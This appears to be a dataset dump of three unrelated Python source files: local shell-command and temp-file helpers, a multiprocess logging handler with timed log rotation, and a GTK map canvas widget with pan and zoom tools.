proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout, stderr = proc.stdout.read(), proc.stderr.read()
return stdout, stderr
def command_interactive(self, cmd):
"""Run an interactive command: which requires an interactive shell."""
self.printer.debug("[LOCAL CMD] Local Interactive Command: %s" % cmd)
out = subprocess.call(cmd, shell=True)
return out
def command_background_start(self, cmd):
"""Run a background command: run it in a new thread and resume execution immediately."""
self.printer.debug('[LOCAL CMD] Local Background Command: %s' % cmd)
def daemon(cmd):
"""Daemon used to run the command so to avoid blocking the UI"""
# Run command
master, slave = pty.openpty()
proc = subprocess.Popen(cmd, shell=True, stdout=slave, stderr=slave, close_fds=True)
stdout = os.fdopen(master)
self.printer.info("Monitoring in background...Kill this process when you want to see the dumped content")
# Run command in a thread
d = threading.Thread(name='daemon', target=daemon, args=(cmd,))
d.setDaemon(True)
d.start()
time.sleep(2)
def command_background_stop(self, procname):
"""Stop a running subprocess."""
self.printer.debug('[LOCAL CMD] Stopping Local Background Command')
cmd = 'pgrep {procname} | xargs kill -9'.format(procname=procname)
self.command_blocking(cmd)
# ==================================================================================================================
# LOCAL FILES
# ==================================================================================================================
def build_temp_path_for_file(self, module, fname):
"""Given a filename, returns the full path in the local temp folder."""
return os.path.join(module.path_home_temp, Utils.extract_filename_from_path(fname))
def delete_temp_file(self, module, fname):
"""Given a filename, delete the corresponding file in the local temp folder."""
temp_file = self.build_temp_path_for_file(module, fname)
self.file_delete(temp_file)
def cat_file(self, fname):
"""Given a filename, prints its content on screen."""
cmd = '{bin} {fname}'.format(bin=Constants.PATH_TOOLS_LOCAL['CAT'], fname=fname)
out, err = self.command_blocking(cmd)
self.printer.notify("Content of file '%s': " % fname)
print(out)
# ==================================================================================================================
# NETWORK
# ==================================================================================================================
def get_ip(self):
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('8.8.8.8', 0))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
|
logs_handler.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, unicode_literals
import codecs
import logging
import multiprocessing
import os
import re
import sys
import threading
import time
import traceback
from logging.handlers import BaseRotatingHandler, _MIDNIGHT
from stat import ST_MTIME
def register_handler(logger=None):
"""Wraps the handlers in the given Logger with an MultiProcHandler.
:param logger: whose handlers to wrap. By default, the root logger.
"""
if logger is None:
logger = logging.getLogger()
for i, orig_handler in enumerate(list(logger.handlers)):
handler = MultiProcHandler(
'mp-handler-{0}'.format(i), sub_handler=orig_handler
)
logger.removeHandler(orig_handler)
logger.addHandler(handler)
class MultiProcHandler(logging.Handler):
def __init__(self, name, sub_handler=None):
super(MultiProcHandler, self).__init__()
if sub_handler is None:
sub_handler = logging.StreamHandler()
self.sub_handler = sub_handler
self.setLevel(self.sub_handler.level)
self.setFormatter(self.sub_handler.formatter)
self.queue = multiprocessing.Queue(-1)
self._is_closed = False
# The thread handles receiving records asynchronously.
self._receive_thread = threading.Thread(target=self._receive, name=name)
self._receive_thread.daemon = True
self._receive_thread.start()
def setFormatter(self, fmt):
super(MultiProcHandler, self).setFormatter(fmt)
self.sub_handler.setFormatter(fmt)
def _receive(self):
while not (self._is_closed and self.queue.empty()):
try:
record = self.queue.get()
self.sub_handler.emit(record)
except (KeyboardInterrupt, SystemExit):
raise
except EOFError:
break
except:
traceback.print_exc(file=sys.stderr)
self.queue.close()
self.queue.join_thread()
def _send(self, s):
self.queue.put_nowait(s)
def _format_record(self, record):
if record.args:
record.msg = record.msg % record.args
record.args = None
if record.exc_info:
self.format(record)
record.exc_info = None
return record
def emit(self, record):
try:
s = self._format_record(record)
self._send(s)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def close(self):
if not self._is_closed:
self._is_closed = True
self._receive_thread.join(5.0) # Waits for receive queue to empty.
self.sub_handler.close()
super(MultiProcHandler, self).close()
class TimedRotatingFileHandler(BaseRotatingHandler):
"""
Handler for logging to a file, rotating the logs file at certain timed
intervals.
If backup_count is > 0, when rollover is done, no more than backup_count
files are kept - the oldest ones are deleted.
"""
def __init__(self, filename, when='h', interval=1, backup_count=0,
encoding=None, delay=False, utc=False):
self.when = when.upper()
self.backup_count = backup_count
self.utc = utc
self.base_filename = filename
if self.when == 'S':
self.interval = 1 # one second
self.suffix = "%Y-%m-%d_%H-%M-%S"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}$"
elif self.when == 'M':
self.interval = 60 # one minute
self.suffix = "%Y-%m-%d_%H-%M"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}$"
elif self.when == 'H':
self.interval = 60 * 60 # one hour
self.suffix = "%Y-%m-%d_%H"
self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}$"
elif self.when == 'D' or self.when == 'MIDNIGHT':
self.interval = 60 * 60 * 24 # one day
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}$"
elif self.when.startswith('W'):
self.interval = 60 * 60 * 24 * 7 # one week
if len(self.when) != 2:
raise ValueError(
"You must specify a day for weekly rollover "
"from 0 to 6 (0 is Monday): %s" % self.when
)
if self.when[1] < '0' or self.when[1] > '6':
raise ValueError(
"Invalid day specified for weekly rollover: %s" % self.when)
self.day_of_week = int(self.when[1])
self.suffix = "%Y-%m-%d"
self.extMatch = r"^\d{4}-\d{2}-\d{2}$"
else:
raise ValueError(
"Invalid rollover interval specified: %s" % self.when)
self.extMatch = re.compile(self.extMatch)
self.current_filename = self._compute_fn()
BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
self.interval = self.interval * interval # multiply by units requested
if os.path.exists(filename):
t = os.stat(filename)[ST_MTIME]
else:
t = int(time.time())
self.rollover_time = self.compute_rollover(t)
def compute_rollover(self, current_time):
"""
Work out the rollover time based on the specified time.
"""
result = current_time + self.interval
# If we are rolling over at midnight or weekly, then the interval
# is already known. What we need to figure out is WHEN the next
# interval is. In other words, if you are rolling over at midnight,
# then your base interval is 1 day, but you want to start that one day
# clock at midnight, not now. So, we have to fudge the rollover_time
# value in order to trigger the first rollover at the right time.
# After that, the regular interval will take care of the rest.
# Note that this code doesn't care about leap seconds.
if self.when == 'MIDNIGHT' or self.when.startswith('W'):
# This could be done with less code, but I wanted it to be clear
if self.utc:
t = time.gmtime(current_time)
else:
t = time.localtime(current_time)
current_hour = t[3]
current_minute = t[4]
current_second = t[5]
# r is the number of seconds left between now and midnight
r = _MIDNIGHT - (
(current_hour * 60 + current_minute) * 60 + current_second)
result = current_time + r
# If we are rolling over on a certain day, add in the number of
# days until the next rollover, but offset by 1 since we just
# calculated the time until the next day starts. There are three
# cases:
# Case 1) The day to rollover is today; in this case, do nothing
# Case 2) The day to rollover is further in the interval (i.e.,
# today is day 2 (Wednesday) and rollover is on
# day 6 (Sunday). Days to next rollover is simply
# 6 - 2 - 1, or 3.
# Case 3) The day to rollover is behind us in the interval (i.e.,
# today is day 5 (Saturday) and rollover is on day 3
# (Thursday). Days to rollover is 6 - 5 + 3, or 4.
# In this case, it's the number of days left in the current
# week (1) plus the number of days in the next week until
# the rollover day (3).
# The calculations described in 2) and 3) above need to have a day
# added. This is because the above time calculation takes us to
# midnight on this day, i.e. the start of the next day.
if self.when.startswith('W'):
day = t[6] # 0 is Monday
if day != self.day_of_week:
if day < self.day_of_week:
daysToWait = self.day_of_week - day
else:
daysToWait = 6 - day + self.day_of_week + 1
new_rollover_time = result + (daysToWait * (60 * 60 * 24))
if not self.utc:
dest_now = t[-1]
dest_rollover_time = time.localtime(new_rollover_time)[
-1]
if dest_now != dest_rollover_time:
if not dest_now:
addend = -3600
else:
addend = 3600
new_rollover_time += addend
result = new_rollover_time
return result
def should_rollover(self, record):
"""
Determine if rollover should occur.
record is not used, as we are just comparing times, but it is needed so
the method signatures are the same
"""
if self.current_filename != self._compute_fn():
return True
# print "No need to rollover: %d, %d" % (t, self.rollover_time)
return 0
def _compute_fn(self):
return self.base_filename + '.' + \
time.strftime(self.suffix, time.localtime())
def get_files_to_delete(self):
"""
Determine the files to delete when rolling over.
More specific than the earlier method, which just used glob.glob().
"""
dir_name, base_name = os.path.split(self.base_filename)
file_names = os.listdir(dir_name)
result = []
prefix = base_name + "."
plen = len(prefix)
for fileName in file_names:
if fileName[:plen] == prefix:
suffix = fileName[plen:]
if self.extMatch.match(suffix):
result.append(os.path.join(dir_name, fileName))
result.sort()
if len(result) < self.backup_count:
result = []
else:
result = result[:len(result) - self.backup_count]
return result
def doRollover(self):
"""
do a rollover; in this case, a date/time stamp is appended to the
filename when the rollover happens. However, you want the file to be
named for the start of the interval, not the current time.
If there is a backup count, then we have to get a list of matching
filenames, sort them and remove the one with the oldest suffix.
"""
if self.stream:
self.stream.close()
self.stream = None
# get the time that this sequence started at and make it a TimeTuple
current_time = int(time.time())
dest_now = time.localtime(current_time)[-1]
t = self.rollover_time - self.interval
if self.utc:
time_tuple = time.gmtime(t)
else:
time_tuple = time.localtime(t)
dstThen = time_tuple[-1]
if dest_now != dstThen:
if dest_now:
addend = 3600
else:
addend = -3600
time_tuple = time.localtime(t + addend)
self.current_filename = self._compute_fn()
if self.backup_count > 0:
for s in self.get_files_to_delete():
os.remove(s)
# print "%s -> %s" % (self.base_filename, dfn)
self.stream = self._open()
new_rollover_time = self.compute_rollover(current_time)
while new_rollover_time <= current_time:
new_rollover_time = new_rollover_time + self.interval
# If DST changes and midnight or weekly rollover, adjust for this.
if (self.when == 'MIDNIGHT' or self.when.startswith(
'W')) and not self.utc:
dest_rollover_time = time.localtime(new_rollover_time)[-1]
if dest_now != dest_rollover_time:
if not dest_now:
addend = -3600
else:
addend = 3600
new_rollover_time += addend
self.rollover_time = new_rollover_time
def _open(self):
if self.encoding is None:
stream = open(self.current_filename, self.mode)
else:
stream = codecs.open(self.current_filename, self.mode,
self.encoding)
if os.path.exists(self.base_filename):
try:
os.remove(self.base_filename)
except OSError:
pass
try:
os.symlink(self.current_filename, self.base_filename)
except OSError:
pass
return stream
|
MapCanvas.py
|
#!/usr/bin/env python3
"""
Project: PyGTK Map Canvas
Title: MapCanvas & UITool Classes
Function: Provides GTK widget for displaying a map.
Author: Ben Knisley [[email protected]]
Created: 8 December, 2019
"""
## Import Python built-ins
import threading
import time
## Import PyGtk modules
import gi
import cairo
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, Gdk, Gio, GObject, GLib
## Import PyMapKit module
import PyMapKit
class UITool(GObject.GObject):
"""
A Tool for MapCanvas providing click to pan, scroll to zoom functionality.
"""
def __init__(self):
self.parent = None
def activate(self, parent):
self.parent = parent
self.parent.connect("left-drag-update", self.left_drag)
self.parent.connect("scroll-up", self.scroll_up)
self.parent.connect("scroll-down", self.scroll_down)
def left_drag(self, caller, x_change, y_change):
""" """
## Calculate new pixel point from drag distance
temp_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, self.parent.width, self.parent.height)
cr = cairo.Context(temp_surface)
cr.save()
cr.translate(int(x_change), int(y_change))
cr.set_source_surface(self.parent.rendered_map)
cr.paint()
cr.restore()
center_x, center_y = self.parent.get_canvas_center()
projx, projy = self.parent.pix2proj((center_x - x_change), (center_y + y_change))
self.parent.set_proj_coordinate(projx, projy)
self.parent.rendered_map = temp_surface
## Call redraw of
self.parent.call_redraw(self)
## Call for map to be rerendered
self.parent.call_rerender(self)
def scroll_up(self, caller):
##
temp_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, self.parent.width, self.parent.height)
cr = cairo.Context(temp_surface)
cr.save()
x_w = -((self.parent.width * 1.1) - self.parent.width) / 2
x_h = -((self.parent.height * 1.1) - self.parent.height) / 2
cr.translate(x_w, x_h)
cr.scale(1.1, 1.1)
cr.set_source_surface(self.parent.rendered_map)
cr.paint()
cr.restore()
self.parent.rendered_map = temp_surface
## Call redraw
self.parent.call_redraw(self)
self.parent.set_scale( self.parent.get_scale() / 1.1 )
self.parent.call_rerender(self)
##
self.parent.call_redraw(self)
def scroll_down(self, caller):
temp_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, self.parent.width, self.parent.height)
cr = cairo.Context(temp_surface)
cr.save()
x_w = -((self.parent.width / 1.1) - self.parent.width) / 2
x_h = -((self.parent.height / 1.1) - self.parent.height) / 2
cr.translate(int(x_w), int(x_h))
cr.scale(1/1.1, 1/1.1)
cr.set_source_surface(self.parent.rendered_map)
cr.paint()
cr.restore()
self.parent.rendered_map = temp_surface
## Call redraw
self.parent.call_redraw(self)
self.parent.call_rerender(self)
self.parent.set_scale( self.parent.get_scale() * 1.1 )
##
self.parent.call_redraw(self)
def middle_click(self, caller, x,y):
self.selected = []
self.parent.call_redraw(self)
def draw(self, cr):
""" """
pass
class _SignalManager(GObject.GObject):
"""
Class to receive and send signals on the behalf of MapCanvas to abstract higher
level functions.
"""
def __init__(self, parent):
""" """
GObject.GObject.__init__(self)
self.map = parent
## Add capability to detect mouse events
self.map.add_events(Gdk.EventMask.BUTTON_PRESS_MASK)
self.map.add_events(Gdk.EventMask.BUTTON_RELEASE_MASK)
self.map.add_events(Gdk.EventMask.BUTTON1_MOTION_MASK)
self.map.add_events(Gdk.EventMask.BUTTON2_MOTION_MASK)
self.map.add_events(Gdk.EventMask.BUTTON3_MOTION_MASK)
self.map.add_events(Gdk.EventMask.SCROLL_MASK)
## Connect Stuff
self.map.connect("scroll-event", self.scroll)
self.map.connect("button-press-event", self.buttonPress)
self.map.connect("button-release-event", self.buttonRelease)
self.map.connect("motion-notify-event", self.mouseDrag)
## Create custom signals
GObject.signal_new("layer-added", self.map, GObject.SIGNAL_RUN_FIRST, None, (object,))
GObject.signal_new("scroll-up", self.map, GObject.SIGNAL_RUN_FIRST, None, ())
GObject.signal_new("scroll-down", self.map, GObject.SIGNAL_RUN_FIRST, None, ())
GObject.signal_new("left-click", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int))
GObject.signal_new("double-click", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int))
GObject.signal_new("left-drag-start", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("left-drag-update", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("left-drag-end", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("middle-click", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int))
GObject.signal_new("middle-drag-start", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("middle-drag-update", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("middle-drag-end", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("right-click", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int))
GObject.signal_new("right-drag-start", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("right-drag-update", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
GObject.signal_new("right-drag-end", self.map, GObject.SIGNAL_RUN_FIRST, None, (int, int,))
## Define public mouse button trackers
self.click_time = 0
self.left_active = False
self.left_init_position = (None, None)
self.left_updated_position = (None, None)
self.middle_active = False
self.middle_init_position = (None, None)
self.middle_updated_position = (None, None)
self.right_active = False
self.right_init_position = (None, None)
self.right_updated_position = (None, None)
def buttonPress(self, caller, click):
if click.button == 1: ## Left click
self.left_active = True
self.left_init_position = (click.x, click.y)
elif click.button == 2: ## Middle click
self.middle_active = True
self.middle_init_position = (click.x, click.y)
else: ## Right click
self.right_active = True
self.right_init_position = (click.x, click.y)
def buttonRelease(self, caller, click):
if click.button == 1: ## Left click
## Do stuff, send signals
if (time.time() - self.click_time) < 0.25:
self.map.emit('double-click', int(click.x), int(click.y))
elif (click.x, click.y) == self.left_init_position:
self.map.emit('left-click', int(click.x), int(click.y))
else:
self.map.emit('left-drag-end', int(click.x), int(click.y))
## Reset trackers
self.click_time = time.time()
self.left_active = False
self.left_init_position = (None, None)
self.left_updated_position = (None, None)
elif click.button == 2: ## Middle click
## Do Stuff
if (click.x, click.y) == self.middle_init_position:
self.map.emit('middle-click', int(click.x), int(click.y))
else:
self.map.emit('middle-drag-end', int(click.x), int(click.y))
## Reset
self.middle_active = False
self.middle_init_position = (None, None)
self.middle_updated_position = (None, None)
else: ## Right click
## Do Stuff
if (click.x, click.y) == self.right_init_position:
self.map.emit('right-click', int(click.x), int(click.y))
else:
self.map.emit('right-drag-end', int(click.x), int(click.y))
## Reset
self.right_active = False
self.right_init_position = (None, None)
self.right_updated_position = (None, None)
def mouseDrag(self, caller, move):
if self.left_active:
if self.left_updated_position == (None, None):
self.map.emit('left-drag-start', int(move.x), int(move.y))
self.left_updated_position = self.left_init_position
init_x, init_y = self.left_updated_position
self.map.emit('left-drag-update', move.x-init_x, move.y-init_y)
## Set drag origin point
self.left_updated_position = (move.x, move.y)
if self.middle_active:
if self.middle_updated_position == (None, None):
self.map.emit('middle-drag-start', int(move.x), int(move.y))
self.middle_updated_position = self.middle_init_position
init_x, init_y = self.middle_updated_position
self.map.emit('middle-drag-update', move.x-init_x, move.y-init_y)
## Set drag origin point
self.middle_updated_position = (move.x, move.y)
if self.right_active:
if self.right_updated_position == (None, None):
self.map.emit('right-drag-start', int(move.x), int(move.y))
self.right_updated_position = self.right_init_position
init_x, init_y = self.right_updated_position
self.map.emit('right-drag-update', move.x-init_x, move.y-init_y)
## Set drag origin point
self.right_updated_position = (move.x, move.y)
def scroll(self, caller, scroll):
""" """
if int(scroll.direction) == 0:
self.map.emit("scroll-up")
else:
self.map.emit("scroll-down")
class MapCanvas(Gtk.DrawingArea, PyMapKit.Map):
"""
A widget that renders a map.
"""
def __init__(self, add_UITool=True):
""" """
## Implement inheritance from GObject, DrawingArea, and PyMapKit.Map
GObject.GObject.__init__(self)
Gtk.DrawingArea.__init__(self)
PyMapKit.Map.__init__(self)
## Create _SignalManager Object to handle map signals for us
self.signal_man = _SignalManager(self)
## Connect basic widget signals
self.connect("configure_event", self.refresh_window)
self.connect("size-allocate", self.refresh_window)
self.connect("draw", self.draw)
## Set map attributes
self.set_background_color('black')
## Add a list to hold tools
self.tools = []
## UITool flag is true, add a UItool
if add_UITool:
self.add_tool(UITool())
## Create background rendering thread variables
self.rendered_map = None
self.render_thread = None
self.is_rendering = False
self.map_updated = True
##
self.active_layer_index = None
""" Tool Functions """
def add_tool(self, new_tool):
new_tool.activate(self)
self.tools.append(new_tool)
def remove_tool(self, tool):
tool.deactivate()
self.tools.remove(tool)
""" Overriding and extending Map methods """
def add_layer(self, new_map_layer, index=-1):
""" """
#@ Extend PyMapKit.add_layer
super().add_layer(new_map_layer, index)
##
self.emit("layer-added", new_map_layer)
self.call_rerender(self)
self.call_redraw(self)
""" Slots Methods """
def refresh_window(self, caller, data):
""" """
## When widget is first created: queue rendering
self.call_rerender(self)
self.call_redraw(self)
""" Map Rendering functions """
def call_rerender(self, caller):
""" Hard ask map to rerender """
self.map_updated = True
GObject.idle_add(self.start_render_thread)
def start_render_thread(self):
""" Opens render_map in a thread """
if self.map_updated:
if not self.is_rendering:
self.render_thread = threading.Thread(target=self.render_map)
self.render_thread.setDaemon(False)
self.render_thread.start()
def render_map(self):
""" Renders map to self.rendered_map """
self.map_updated = False
self.is_rendering = True
temp_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, self.get_allocated_width(), self.get_allocated_height())
cr = cairo.Context(temp_surface)
self.render(cr)
if self.map_updated == False:
self.rendered_map = temp_surface
else:
self.render_map()
self.map_updated = False
self.is_rendering = False
self.call_redraw(self)
""" Widget Drawing functions """
def call_redraw(self, caller):
""" Asks canvas to redraw itself """
self.queue_draw()
def draw(self, caller, cr):
""" """
## Set match size matches widget size
self.set_size(self.get_allocated_width(), self.get_allocated_height())
self.renderer.draw_background(cr, self._background_color)
## If
if self.rendered_map:
cr.set_source_surface(self.rendered_map)
cr.paint()
self.render_thread.join(0)
for tool in self.tools:
tool.draw(cr)
## Draw map again
self.call_redraw(self)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.